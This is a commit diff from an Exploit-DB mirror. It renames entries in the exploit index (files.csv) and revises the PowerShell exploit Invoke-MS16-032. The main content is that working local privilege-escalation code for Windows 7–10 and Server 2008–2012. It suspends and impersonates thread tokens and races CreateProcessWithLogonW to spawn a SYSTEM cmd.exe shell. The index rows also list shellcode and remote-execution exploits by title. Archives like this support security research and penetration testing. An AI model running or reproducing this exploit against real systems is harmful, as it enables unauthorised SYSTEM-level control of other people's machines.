bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-07-13

Browse source
This commit is contained in:
Offensive Security 2016-07-13 05:07:07 +00:00
parent fc4bc08825
commit 5cf8f533ae
2 changed files with 76 additions and 78 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -2868,7 +2868,7 @@ id,file,description,date,author,platform,type,port
3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0
3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0
3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)",2007-01-25,MoAB,osx,dos,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)",2007-01-25,MoAB,osx,dos,0
3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0
3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0
3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0 3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0
@ -11735,7 +11735,7 @@ id,file,description,date,author,platform,type,port
40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0 40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0
40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)",2016-07-11,"Mehmet Ince",php,remote,80 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
@ -35918,7 +35918,7 @@ id,file,description,date,author,platform,type,port
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@ -36003,7 +36003,7 @@ id,file,description,date,author,platform,type,port
39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0

Can't render this file because it is too large.

144
platforms/windows/local/39719.ps1
View file

@ -15,17 +15,15 @@ function Invoke-MS16-032 {
* In order for the race condition to succeed the machine must have 2+ CPU * In order for the race condition to succeed the machine must have 2+ CPU
cores. If testing in a VM just make sure to add a core if needed mkay. cores. If testing in a VM just make sure to add a core if needed mkay.
* The exploit is pretty reliable, however ~1/6 times it will say it succeeded
but not spawn a shell. Not sure what the issue is but just re-run and profit!
* Want to know more about MS16-032 ==> * Want to know more about MS16-032 ==>
https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
.DESCRIPTION .DESCRIPTION
Author: Ruben Boonen (@FuzzySec) Author: Ruben Boonen (@FuzzySec)
Blog: http://www.fuzzysecurity.com/ Blog: http://www.fuzzysecurity.com/
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: PowerShell v2+ Required Dependencies: PowerShell v2+
Optional Dependencies: None Optional Dependencies: None
E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736
.EXAMPLE .EXAMPLE
C:\PS> Invoke-MS16-032 C:\PS> Invoke-MS16-032
@ -209,20 +207,19 @@ function Invoke-MS16-032 {
} }
function Get-SystemToken { function Get-SystemToken {
echo "`n[?] Trying thread handle: $Thread" echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
$CallResult = [Kernel32]::SuspendThread($Thread) $CallResult = [Kernel32]::SuspendThread($hThread)
if ($CallResult -ne 0) { if ($CallResult -ne 0) {
echo "[!] $Thread is a bad thread, moving on.." echo "[!] $hThread is a bad thread, exiting.."
Return Return
} echo "[+] Thread suspended" } echo "[+] Thread suspended"
echo "[>] Wiping current impersonation token" echo "[>] Wiping current impersonation token"
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero) $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
if (!$CallResult) { if (!$CallResult) {
echo "[!] SetThreadToken failed, moving on.." echo "[!] SetThreadToken failed, exiting.."
$CallResult = [Kernel32]::ResumeThread($Thread) $CallResult = [Kernel32]::ResumeThread($hThread)
echo "[+] Thread resumed!" echo "[+] Thread resumed!"
Return Return
} }
@ -233,27 +230,29 @@ function Invoke-MS16-032 {
$SQOS.ImpersonationLevel = 2 #SecurityImpersonation $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
# Undocumented API's, I like your style Microsoft ;) # Undocumented API's, I like your style Microsoft ;)
$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos) $CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
if ($CallResult -ne 0) { if ($CallResult -ne 0) {
echo "[!] NtImpersonateThread failed, moving on.." echo "[!] NtImpersonateThread failed, exiting.."
$CallResult = [Kernel32]::ResumeThread($Thread) $CallResult = [Kernel32]::ResumeThread($hThread)
echo "[+] Thread resumed!" echo "[+] Thread resumed!"
Return Return
} }
# Null $SysTokenHandle
$script:SysTokenHandle = [IntPtr]::Zero $script:SysTokenHandle = [IntPtr]::Zero
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle) $CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
if (!$CallResult) { if (!$CallResult) {
echo "[!] OpenThreadToken failed, moving on.." echo "[!] OpenThreadToken failed, exiting.."
$CallResult = [Kernel32]::ResumeThread($Thread) $CallResult = [Kernel32]::ResumeThread($hThread)
echo "[+] Thread resumed!" echo "[+] Thread resumed!"
Return Return
} }
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
echo "[+] Resuming thread.." echo "[+] Resuming thread.."
$CallResult = [Kernel32]::ResumeThread($Thread) $CallResult = [Kernel32]::ResumeThread($hThread)
} }
# main() <--- ;) # main() <--- ;)
@ -275,62 +274,49 @@ function Invoke-MS16-032 {
Return Return
} }
# Create array for Threads & TID's echo "[>] Duplicating CreateProcessWithLogonW handle"
$ThreadArray = @() $hThread = Get-ThreadHandle
$TidArray = @()
echo "[>] Duplicating CreateProcessWithLogonW handles.." # If no thread handle is captured, the box is patched
# Loop Get-ThreadHandle and collect thread handles with a valid TID if (!$hThread) {
for ($i=0; $i -lt 500; $i++) { echo "[!] No valid thread handles were captured, exiting!`n"
$hThread = Get-ThreadHandle
$hThreadID = [Kernel32]::GetThreadId($hThread)
# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
if ($TidArray -notcontains $hThreadID) {
$TidArray += $hThreadID
if ($hThread -ne 0) {
$ThreadArray += $hThread # This is what we need!
}
}
}
if ($($ThreadArray.length) -eq 0) {
echo "[!] No valid thread handles were captured, exiting!"
Return Return
} else { } else {
echo "[?] Done, got $($ThreadArray.length) thread handle(s)!" echo "[?] Done, using thread handle: $hThread"
echo "`n[?] Thread handle list:" } echo "`n[*] Sniffing out privileged impersonation token.."
$ThreadArray
# Get handle to SYSTEM access token
Get-SystemToken
# If we fail a check in Get-SystemToken, skip loop
if ($SysTokenHandle -eq 0) {
Return
} }
echo "`n[*] Sniffing out privileged impersonation token.." echo "`n[*] Sniffing out SYSTEM shell.."
foreach ($Thread in $ThreadArray){ echo "`n[>] Duplicating SYSTEM token"
$hDuplicateTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
# Get handle to SYSTEM access token # Simple PS runspace definition
Get-SystemToken echo "[>] Starting token race"
$Runspace = [runspacefactory]::CreateRunspace()
echo "`n[*] Sniffing out SYSTEM shell.." $StartTokenRace = [powershell]::Create()
echo "`n[>] Duplicating SYSTEM token" $StartTokenRace.runspace = $Runspace
$hDuplicateTokenHandle = [IntPtr]::Zero $Runspace.Open()
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) [void]$StartTokenRace.AddScript({
Param ($hThread, $hDuplicateTokenHandle)
# Simple PS runspace definition while ($true) {
echo "[>] Starting token race" $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
$Runspace = [runspacefactory]::CreateRunspace() }
$StartTokenRace = [powershell]::Create() }).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
$StartTokenRace.runspace = $Runspace $AscObj = $StartTokenRace.BeginInvoke()
$Runspace.Open()
[void]$StartTokenRace.AddScript({ echo "[>] Starting process race"
Param ($Thread, $hDuplicateTokenHandle) # Adding a timeout (10 seconds) here to safeguard from edge-cases
while ($true) { $SafeGuard = [diagnostics.stopwatch]::StartNew()
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle) while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
}
}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
$AscObj = $StartTokenRace.BeginInvoke()
echo "[>] Starting process race"
# Adding a timeout (10 seconds) here to safeguard from edge-cases
$SafeGuard = [diagnostics.stopwatch]::StartNew()
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
# StartupInfo Struct # StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO $StartupInfo = New-Object STARTUPINFO
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
@ -347,6 +333,18 @@ function Invoke-MS16-032 {
0x00000002, "C:\Windows\System32\cmd.exe", "", 0x00000002, "C:\Windows\System32\cmd.exe", "",
0x00000004, $null, $GetCurrentPath, 0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo) [ref]$StartupInfo, [ref]$ProcessInfo)
#---
# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
#---
# Missing this check used to cause the exploit to fail sometimes.
# If CreateProcessWithLogon fails OpenProcessToken won't succeed
# but we obviously don't have a SYSTEM shell :'( . Should be 100%
# reliable now!
#---
if (!$CallResult) {
continue
}
$hTokenHandle = [IntPtr]::Zero $hTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
@ -363,10 +361,10 @@ function Invoke-MS16-032 {
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
}
# Kill runspace & stopwatch if edge-case
$StartTokenRace.Stop()
$SafeGuard.Stop()
} }
# Kill runspace & stopwatch if edge-case
$StartTokenRace.Stop()
$SafeGuard.Stop()
} }